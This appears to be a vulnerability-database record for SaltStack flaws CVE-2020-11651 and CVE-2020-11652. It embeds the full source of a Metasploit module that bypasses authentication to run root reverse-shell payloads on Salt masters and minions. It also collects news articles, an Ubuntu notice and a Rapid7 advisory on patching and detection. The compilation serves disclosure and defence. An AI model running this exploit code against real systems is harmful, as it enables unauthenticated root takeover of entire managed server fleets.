1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-11T17:05:38", "type": "metasploit", "title": "SaltStack Salt Master/Minion Unauthenticated RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-07-05T16:16:47", "id": "MSF:EXPLOIT/LINUX/MISC/SALTSTACK_SALT_UNAUTH_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE',\n 'Description' => %q{\n This module exploits unauthenticated access to the runner() and\n _send_pub() methods in the SaltStack Salt master's ZeroMQ request\n server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to\n execute code as root on either the master or on select minions.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as\n well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual\n Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,\n 1.3, 1.5, and 1.6 in certain configurations, are known to be affected\n by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Master (Python payload)',\n 'Description' => 'Executing Python payload on the master',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n ],\n [\n 'Master (Unix command)',\n 'Description' => 'Executing Unix command on the master',\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n ],\n [\n 'Minions (Python payload)',\n 'Description' => 'Executing Python payload on the minions',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_https'\n }\n ],\n [\n 'Minions (Unix command)',\n 'Description' => 'Executing Unix command on the minions',\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n # cmd/unix/reverse_python_ssl crashes in this target\n 'PAYLOAD' => 'cmd/unix/reverse_python'\n }\n ]\n ],\n 'DefaultTarget' => 0, # Defaults to master for safety\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506),\n OptString.new('ROOT_KEY', [false, \"Master's root key if you have it\"]),\n OptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/])\n ])\n\n register_advanced_options([\n OptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10])\n ])\n\n # XXX: https://github.com/rapid7/metasploit-framework/issues/12963\n import_target_defaults\n end\n\n # NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key\n\n def exploit\n if target.name.start_with?('Master')\n if (root_key = datastore['ROOT_KEY'])\n print_status(\"User-specified root key: #{root_key}\")\n else\n # check.reason is from auxiliary/gather/saltstack_salt_root_key\n root_key = check.reason\n end\n\n unless root_key\n fail_with(Failure::BadConfig,\n \"#{target['Description']} requires a root key\")\n end\n end\n\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n print_status(\"#{target['Description']}: #{datastore['PAYLOAD']}\")\n\n case target.name\n when /^Master/\n yeet_runner(root_key)\n when /^Minions/\n yeet_send_pub\n end\n\n # HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one\n sleep(wfs_delay)\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_runner(root_key)\n print_status(\"Yeeting runner() at #{peer}\")\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951\n runner = {\n 'cmd' => 'runner',\n # https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd\n 'fun' => 'salt.cmd',\n 'kwarg' => {\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet'\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'key' => root_key # No JID needed, only the root key!\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n runner['kwarg'].merge!(\n 'fun' => 'cmd.exec_code',\n 'lang' => payload.arch.first,\n 'code' => payload.encoded\n )\n when :unix_cmd\n # HTTPS doesn't appear to be supported by the server :(\n print_status(\"Serving intermediate stager over HTTP: #{start_service}\")\n\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script\n runner['kwarg'].merge!(\n # cmd.run doesn't work due to a missing argument error, so we use this\n 'fun' => 'cmd.script',\n 'source' => get_uri,\n 'stdin' => payload.encoded\n )\n end\n\n vprint_status(\"Unserialized clear load: #{runner}\")\n zmq_send_message(serialize_clear_load(runner))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive runner() response')\n end\n\n vprint_good(\"Received runner() response: #{res.inspect}\")\n end\n\n def yeet_send_pub\n print_status(\"Yeeting _send_pub() at #{peer}\")\n\n # NOTE: A unique JID (job ID) is needed for every published job\n jid = generate_jid\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151\n # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151\n send_pub = {\n 'cmd' => '_send_pub',\n 'kwargs' => {\n 'bg' => true,\n 'hide_output' => true,\n 'ignore_retcode' => true,\n 'output_loglevel' => 'quiet',\n 'show_jid' => false,\n 'show_timeout' => false\n },\n 'user' => 'root', # This is NOT the Unix user!\n 'tgt' => datastore['MINIONS'].source,\n 'tgt_type' => 'pcre',\n 'jid' => jid\n }\n\n case target['Type']\n when :python\n vprint_status(\"Executing Python code: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code\n send_pub.merge!(\n 'fun' => 'cmd.exec_code',\n 'arg' => [payload.arch.first, payload.encoded]\n )\n when :unix_cmd\n vprint_status(\"Executing Unix command: #{payload.encoded}\")\n\n # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run\n send_pub.merge!(\n 'fun' => 'cmd.run',\n 'arg' => [payload.encoded]\n )\n end\n\n vprint_status(\"Unserialized clear load: #{send_pub}\")\n zmq_send_message(serialize_clear_load(send_pub))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive _send_pub() response')\n end\n\n vprint_good(\"Received _send_pub() response: #{res.inspect}\")\n\n # NOTE: This path will likely change between platforms and distros\n register_file_for_cleanup(\"/var/cache/salt/minion/proc/#{jid}\")\n end\n\n # https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py\n # https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py\n def generate_jid\n DateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N')\n end\n\n # HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP\n def stager_instance\n nil\n end\n\n # HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP\n def exe\n # NOTE: The shebang line is necessary in this case!\n <<~SHELL\n #!/bin/sh\n /bin/sh\n SHELL\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-10-14T22:25:49", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-5135"], "description": "The open-source Salt management framework contains high-severity security vulnerabilities that allow full remote code execution as root on servers in data centers and cloud environments. And in-the-wild attacks are expected imminently.\n\nAccording to F-Secure researchers, the framework, authored by the company SaltStack but also used as an [open-source configuration tool](<https://github.com/saltstack/salt>) to monitor and update the state of servers, has a pair of flaws within its default communications protocol, known as ZeroMQ.\n\nA bug tracked as CVE-2020-11651 is an authentication bypass issue, while CVE-2020-11652 is a directory-traversal flaw where untrusted input (i.e. parameters in network requests) is not sanitized correctly. This in turn allows access to the entire filesystem of the master server, researchers found.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bugs are especially dangerous given the topography of the Salt framework.\n\n\u201cEach server [managed by Salt] runs an agent called a \u2018minion,\u2019 which connects to a \u2018master,'\u201d explained F-Secure, [in a writeup](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) on Thursday. \u201c[A master is a] Salt installation that collects state reports from minions and publishes update messages that minions can act on.\u201d\n\nThese update messages are usually used to change the configuration of a selection of servers, but they can also be used to push out commands to multiple, or even all, of the managed systems, researchers said. An adversary thus can compromise the master in order to send malicious commands to all of the other servers in the cluster, all at the same time.\n\n## **Lapses in Protocol**\n\nTo communicate, the master uses two [ZeroMQ channels](<https://docs.saltstack.com/en/getstarted/system/communication.html>). As F-Secure explained, one is a \u201crequest server\u201d where minions can connect to report their status (or the output of commands). The other is a \u201cpublish server\u201d where the master publishes messages that the minions can connect and subscribe to.\n\nThe authentication bypass can be achieved because the ClearFuncs class processes unauthenticated requests and unintentionally exposes the \u201c_send_pub().\u201d This is the method used to queue messages from the master publish server to the minions \u2013 and thus can be used to send arbitrary commands. Such messages can be used to trigger minions to run arbitrary commands as root.\n\nAlso, \u201cthe ClearFuncs class also exposes the method _prep_auth_info(), which returns the root key used to authenticate commands from the local root user on the master server. This root key can then be used to remotely call administrative commands on the master server. This unintentional exposure provides a remote un-authenticated attacker with root-equivalent access to the salt master.\u201d\n\nAs for the directory traversal, the \u201cwheel\u201d module contains commands used to read and write files under specific directory paths.\n\n\u201cThe inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction,\u201d according to the writeup. \u201cThe get_token() method of the salt.tokens.localfs class (which is exposed to unauthenticated requests by the ClearFuncs class) fails to sanitize the token input parameter which is then used as a filename, allowing\u2026the reading of files outside of the intended directory.\u201d\n\nThe bugs together allow attackers \u201cwho can connect to the request server port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the master server filesystem and steal the secret key used to authenticate to the master as root,\u201d according to the firm.\n\nAccording to the National Vulnerability Database, \u201cThe salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\u201d\n\n## **Exploits in Less Than a Day**\n\nF-Secure said that it expects to see attacks in the wild very shortly.\n\n\u201cWe expect that any competent hacker will be able to create 100 percent reliable exploits for these issues in under 24 hours,\u201d the researchers said, citing the \u201creliability and simplicity\u201d of exploitation.\n\nUnfortunately, the firm also said that a preliminary scan has revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet.\n\nPatches are available in release 3000.2. Also, \u201cadding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\u201d F-Secure concluded.\n\nTo detect a compromise, ASCII strings \u201c_prep_auth_info\u201d or \u201c_send_pub\u201d will show up in the request server port data (default 4506).\n\nAlso on the detection front, \u201cpublished messages to minions are called \u2018jobs\u2019 and will be saved on the master (default path /var/cache/salt/master/jobs/). These saved jobs can be audited for malicious content or job IDs (\u2018jids\u2019) that look out of the ordinary,\u201d F-Secure noted.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "modified": "2020-04-30T20:54:50", "published": "2020-04-30T20:54:50", "id": "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "href": "https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/", "type": "threatpost", "title": "Salt Bugs Allow Full RCE as Root on Cloud Servers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:19:14", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651", "CVE-2020-11652", "CVE-2020-24400", "CVE-2020-24407"], "description": "Cisco said attackers have been able to compromise its servers after exploiting two known, critical[ SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which are used in Cisco network-tooling products.\n\nTwo Cisco products incorporate a version of SaltStack that is running the vulnerable salt-master service. The first is Cisco Modeling Labs Corporate Edition (CML), which gives users a virtual sandbox environment to design and configure network topologies. The second is Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), used to design, configure and operate networks using versions of Cisco\u2019s network operating systems.\n\nHackers were able to successfully exploit the flaws incorporated in the latter product, resulting in the compromise of six VIRL-PE backend servers, according to Cisco. Those servers are: us-1.virl.info, us-2.virl.info, us-3.virl.info, us-4.virl.info, vsm-us-1.virl.info and vsm-us-2.virl.info.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE,\u201d according to [Cisco\u2019s Thursday alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>). \u201cThose servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.\u201d\n\nCisco said the servers were remediated on May 7. The company also released software updates for the two vulnerable products. Cisco said that the update is \u201ccritical,\u201d ranking it 10 out of 10 on the CVSS scale.\n\nThe SaltStack bugs were first made public by the Salt Open Core team on April 29. The flaws can allow full remote code execution as root on servers in data centers and cloud environments. They include an authentication bypass issue, tracked as CVE-2020-11651, and a directory-traversal flaw, CVE-2020-11652, where untrusted inputs (i.e. parameters in network requests) are not sanitized correctly. This in turn allows access to the entire file system of the master server, researchers found.\n\nSaltStack released patches for the flaw in [release 3000.2](<https://lists.opensuse.org/opensuse-security-announce/2020-04/msg00047.html>), on April 30 \u2013 however, researchers with F-Secure, who discovered the flaw, said a preliminary scan revealed more than 6,000 potentially vulnerable Salt instances exposed to the public internet \u2014 and warned that exploits in the wild are imminent.\n\nThose predictions have proved true: In the beginning of May, for instance, hackers targeted the publishing platform Ghost by exploiting critical [vulnerabilities in ](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>)[SaltStack](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>), used in Ghost\u2019s server management infrastructure to launch a cryptojacking attack against its servers that led to widespread outages.\n\nCisco said that for Cisco CML and Cisco VIRL-PE (software releases 1.5 and 1.6) if the salt-master service is enabled \u201cthe exploitability of the product depends on how the product has been deployed.\u201d A full list of the impact and recommended action for each deployment option, for each Cisco software release, [can be found on Cisco\u2019s alert](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG>).\n\nTo be exploited, the salt-master service must be reachable on TCP ports 4505 and 4506, Cisco said. The company added that administrators can check their configured Cisco salt-master server by navigating to VIRL Server &gt; Salt Configuration and Status.\n\n\u201cCisco continues to strongly recommend that customers upgrade to a fixed software release to remediate these vulnerabilities,\u201d Cisco said.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "modified": "2020-05-28T20:51:25", "published": "2020-05-28T20:51:25", "id": "THREATPOST:64DC6B60F693E46DD314DB70A547D319", "href": "https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/", "type": "threatpost", "title": "Hackers Compromise Cisco Servers Via SaltStack Flaws", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2021-07-28T18:46:42", "description": "It was discovered that Salt allows remote attackers to determine which files \nexist on the server. An attacker could use that to extract sensitive \ninformation. (CVE-2018-15750)\n\nIt was discovered that Salt has a vulnerability that allows an user to bypass \nauthentication. An attacker could use that to extract sensitive information, \nexecute abritrary code or crash the server. (CVE-2018-15751)\n\nIt was discovered that Salt is vulnerable to command injection. This allows \nan unauthenticated attacker with network access to the API endpoint to \nexecute arbitrary code on the salt-api host. (CVE-2019-17361)\n\nIt was discovered that Salt incorrectly validated method calls and \nsanitized paths. A remote attacker could possibly use this issue to access \nsome methods without authentication. (CVE-2020-11651, CVE-2020-11652)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-08-13T00:00:00", "title": "Salt vulnerabilities", "type": "ubuntu", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15751", "CVE-2020-11652", "CVE-2020-11651", "CVE-2018-15750", "CVE-2019-17361"], "modified": "2020-08-13T00:00:00", "id": "USN-4459-1", "href": "https://ubuntu.com/security/notices/USN-4459-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-11-10T14:46:17", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651", "CVE-2020-16846", "CVE-2020-25592"], "description": "## What\u2019s up?\n\n\n\nWe start the November critical vulnerability season with a pair of CVEs\u2014[CVE-2020-16846](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection>) and [CVE-2020-25592](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution>)\u2014that, when combined, can result in unauthenticated remote root access on a target system. SaltStack developers [disclosed these weaknesses on Nov. 3, 2020](<https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/>) and have [released patches](<https://gitlab.com/saltstack/open/salt-patches>) for these weaknesses.\n\nBefore reading on, Rapid7 advises all SaltStack users to patch their systems as quickly as possible. If at all possible, **please don\u2019t wait for your typical patch cycle to apply SaltStack security updates.** There are no known mitigations or workarounds as of Nov. 9, 2020. As noted in the aforelinked AttackerKB Rapid7 analysis: _\u201cPre-authenticated remote root is the gold-medal standard for attackers, and it took Rapid7 researchers all of 15 minutes and a single HTTP request to get there.\u201d_\n\n## SaltStack vulnerability information, exposure details, and attacker activity\n\nSaltStack developers noted that the following versions are affected:\n\n * 3002\n * 3001.1, 3001.2\n * 3000.3, 3000.4\n * 2019.2.5, 2019.2.6\n * 2018.3.5\n * 2017.7.4, 2017.7.8\n * 2016.11.3, 2016.11.6, 2016.11.10\n * 2016.3.4, 2016.3.6, 2016.3.8\n * 2015.8.10, 2015.8.13\n\nWhile none of the CVEs have a rating (yet), these combined weaknesses are trivial to exploit and result in complete system compromise, which will happen, since [CVE-2020-11651](<https://attackerkb.com/topics/rEVl04z1p0/cve-2020-11651>), another SaltStack vulnerability from April 2020, was exploited quickly by threat actors. We fully expect CVEs 2020-16846 and 2020-25592 to follow that same path.\n\n\n\n[Rapid7 Labs](<https://www.rapid7.com/research/project-sonar/>) thankfully only discovered 215 vulnerable SaltStack servers in November 2020 scans, but that doesn\u2019t mean your internal SaltStack nodes will not be identified and compromised by attackers who gain footholds as a result of [phishing attacks](<https://www.rapid7.com/fundamentals/phishing-attacks/>).\n\nThere are no mitigations for these vulnerabilities. You must patch your systems to be safe. As of Nov. 9, 2020, Rapid7 Labs[ Project Heisenberg](<https://www.rapid7.com/research/project-heisenberg/>), our global honeypot network, did not detect any malicious SaltStack activity, but that will likely change very quickly.\n\n## Final guidance\n\nAlong with patching, organizations should monitor SaltStack API logs very closely for anomalous activity going back to at least Nov. 3, 2020 and until/after affected SaltStack systems are patched.\n\nGiven that there have been two severe SaltStack weakness episodes in one calendar year, Rapid7 further suggests organizations increase monitoring for anomalies in general on SaltStack systems and stay on top of vulnerability announcements from the SaltStack developers.\n\n#### Vulnerable to CVE-2020-16846 and CVE-2020-25592? Scan Your Environment Today to Find Out.\n\n[Get Started](<https://www.rapid7.com/trial/insightvm>)", "modified": "2020-11-10T14:22:33", "published": "2020-11-10T14:22:33", "id": "RAPID7BLOG:54F1D96262CFC427DBA32564C2E47A77", "href": "https://blog.rapid7.com/2020/11/10/saltstack-pre-authenticated-remote-root-cve-2020-16846-and-cve-2020-25592-what-you-need-to-know/", "type": "rapid7blog", "title": "SaltStack Pre-Authenticated Remote Root (CVE-2020-16846 and CVE-2020-25592): What You Need to Know", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}